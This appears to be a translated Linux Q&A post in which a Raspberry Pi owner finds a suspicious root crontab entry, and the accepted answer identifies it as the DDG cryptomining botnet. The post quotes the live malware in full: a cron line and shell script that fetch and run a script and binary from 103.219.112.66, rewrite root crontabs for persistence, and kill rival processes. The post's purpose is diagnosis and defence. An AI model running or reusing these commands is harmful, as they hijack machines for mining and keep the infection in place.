GNU/Linux >> Tutoriales Linux >  >> Linux

¿Entrada crontab sospechosa que ejecuta 'xribfa4' cada 15 minutos?

Quería agregar algo a mi archivo crontab raíz en mi Raspberry Pi, y encontré una entrada que me parece sospechosa, al buscar partes en Google no encontré nada.

Entrada crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

El contenido de http://103.219.112.66:8000/i.sh son:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Mi conocimiento de Linux es limitado, pero me parece que descargar binarios de un servidor indonesio y ejecutarlos como root regularmente no es algo habitual.

¿Que es esto? ¿Qué debo hacer?

Respuesta aceptada:

Es una botnet de minería DDG, cómo funciona:

  1. explotación de una vulnerabilidad RCE
  2. modificando el crontab
  3. descargando el programa de minería apropiado (escrito con go)
  4. comenzando el proceso de minería

DDG:una botnet de minería que apunta a servidores de bases de datos

SystemdMiner cuando una botnet toma prestada la infraestructura de otra botnet

U&L:¿Cómo puedo eliminar el malware minero en una instancia de AWS EC2? (servidor comprometido)


Linux
  1. ¿Ejecutar un script cada vez que se instala un nuevo kernel?

  2. ¿Cómo obtener el Tty en el que se está ejecutando Bash?

  3. Cómo evitar que un usuario no root cree una entrada crontab

  4. Comando de Linux para verificar si un script de shell se está ejecutando o no

  5. crontab se ejecuta cada 15 minutos entre ciertas horas

Cómo ejecutar trabajos cron cada 5, 10 o 15 minutos

Cómo ejecutar un trabajo Crontab cada semana el domingo

ejecutando un comando contra cada línea en un archivo de texto

HDDTemp crontab cada hora en el archivo

Ejemplo de crontab:cada 5 minutos

¿Cómo puedo hacer que un trabajo cron se ejecute cada 30 minutos?